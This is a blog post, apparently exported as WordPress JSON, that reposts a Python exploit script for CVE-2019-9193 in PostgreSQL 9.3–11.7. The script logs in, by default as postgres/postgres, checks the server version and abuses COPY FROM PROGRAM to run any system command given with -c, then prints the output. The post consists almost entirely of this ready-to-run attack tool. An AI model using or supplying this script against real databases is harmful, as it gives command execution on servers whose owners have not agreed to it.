# Exploit Title: PostgreSQL 9.3-11.7 – Remote Code Execution (RCE) (Authenticated)
\n# Date: 2022-03-29
\n# Exploit Author: b4keSn4ke
\n# Github: https:\/\/github.com\/b4keSn4ke
\n# Vendor Homepage: https:\/\/www.postgresql.org\/
\n# Software Link: https:\/\/www.postgresql.org\/download\/linux\/debian\/
\n# Version: 9.3 – 11.7
\n# Tested on: Linux x86-64 – Debian 4.19
\n# CVE: CVE-2019\u20139193<\/p>\n
#!\/usr\/bin\/python3<\/p>\n
import psycopg2
\nimport argparse
\nimport hashlib
\nimport time<\/p>\n
def parseArgs():
\nparser = argparse.ArgumentParser(description=’CVE-2019\u20139193 – PostgreSQL 9.3-11.7 Authenticated Remote Code Execution’)
\nparser.add_argument(‘-i’, ‘–ip’, nargs=’?’, type=str, default=’127.0.0.1′, help=’The IP address of the PostgreSQL DB [Default: 127.0.0.1]’)
\nparser.add_argument(‘-p’, ‘–port’, nargs=’?’, type=int, default=5432, help=’The port of the PostgreSQL DB [Default: 5432]’)
\nparser.add_argument(‘-d’, ‘–database’, nargs=’?’, default=’template1′, help=’Name of the PostgreSQL DB [Default: template1]’)
\nparser.add_argument(‘-c’, ‘–command’, nargs=’?’, help=’System command to run’)
\nparser.add_argument(‘-t’, ‘–timeout’, nargs=’?’, type=int, default=10, help=’Connection timeout in seconds [Default: 10 (seconds)]’)
\nparser.add_argument(‘-U’, ‘–user’, nargs=’?’, default=’postgres’, help=’Username to use to connect to the PostgreSQL DB [Default: postgres]’)
\nparser.add_argument(‘-P’, ‘–password’, nargs=’?’, default=’postgres’, help=’Password to use to connect to the the PostgreSQL DB [Default: postgres]’)
\nargs = parser.parse_args()
\nreturn args<\/p>\n
def main():
\ntry:
\nprint (“\\r\\n[+] Connecting to PostgreSQL Database on {0}:{1}”.format(args.ip, args.port))
\nconnection = psycopg2.connect (
\ndatabase=args.database,
\nuser=args.user,
\npassword=args.password,
\nhost=args.ip,
\nport=args.port,
\nconnect_timeout=args.timeout
\n)
\nprint (“[+] Connection to Database established”)<\/p>\n
print (“[+] Checking PostgreSQL version”)
\ncheckVersion(connection)<\/p>\n
if(args.command):
\nexploit(connection)
\nelse:
\nprint (“[+] Add the argument -c [COMMAND] to execute a system command”)<\/p>\n
except psycopg2.OperationalError as e:
\nprint (“\\r\\n[-] Connection to Database failed: \\r\\n{0}”.format(e))
\nexit()<\/p>\n
def checkVersion(connection):
\ncursor = connection.cursor()
\ncursor.execute(“SELECT version()”)
\nrecord = cursor.fetchall()
\ncursor.close()<\/p>\n
result = deserialize(record)
\nversion = float(result[(result.find(“PostgreSQL”)+11):(result.find(“PostgreSQL”)+11)+4])<\/p>\n
if (version >= 9.3 and version <= 11.7):
\nprint(“[+] PostgreSQL {0} is likely vulnerable”.format(version))<\/p>\n
else:
\nprint(“[-] PostgreSQL {0} is not vulnerable”.format(version))
\nexit()<\/p>\n
def deserialize(record):
\nresult = “”
\nfor rec in record:
\nresult += rec[0]+”\\r\\n”
\nreturn result<\/p>\n
def randomizeTableName():
\nreturn (“_” + hashlib.md5(time.ctime().encode(‘utf-8’)).hexdigest())<\/p>\n
def exploit(connection):
\ncursor = connection.cursor()
\ntableName = randomizeTableName()
\ntry:
\nprint (“[+] Creating table {0}”.format(tableName))
\ncursor.execute(“DROP TABLE IF EXISTS {1};\\
\nCREATE TABLE {1}(cmd_output text);\\
\nCOPY {1} FROM PROGRAM ‘{0}’;\\
\nSELECT * FROM {1};”.format(args.command,tableName))<\/p>\n
print (“[+] Command executed\\r\\n”)<\/p>\n
record = cursor.fetchall()
\nresult = deserialize(record)<\/p>\n
print(result)
\nprint (“[+] Deleting table {0}\\r\\n”.format(tableName))<\/p>\n
cursor.execute(“DROP TABLE {0};”.format(tableName))
\ncursor.close()<\/p>\n
except psycopg2.errors.ExternalRoutineException as e:
\nprint (“[-] Command failed : {0}”.format(e.pgerror))
\nprint (“[+] Deleting table {0}\\r\\n”.format(tableName))
\ncursor = connection.cursor()
\ncursor.execute(“DROP TABLE {0};”.format(tableName))
\ncursor.close()<\/p>\n
finally:
\nexit()<\/p>\n
if __name__ == “__main__”:
\nargs = parseArgs()
\nmain()<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: PostgreSQL 9.3-11.7 – Remote Code Execution (RCE) (Authenticated) # Date: 2022-03-29 # Exploit Author: b4keSn4ke # Github: https:\/\/github.com\/b4keSn4ke # Vendor Homepage: https:\/\/www.postgresql.org\/ # Software Link: https:\/\/www.postgresql.org\/download\/linux\/debian\/ # Version: 9.3 – 11.7 # Tested on: Linux x86-64 – Debian 4.19 # CVE: CVE-2019\u20139193 #!\/usr\/bin\/python3 import psycopg2 import argparse import hashlib import time def …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-22370","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/22370","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=22370"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/22370\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=22370"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=22370"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=22370"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}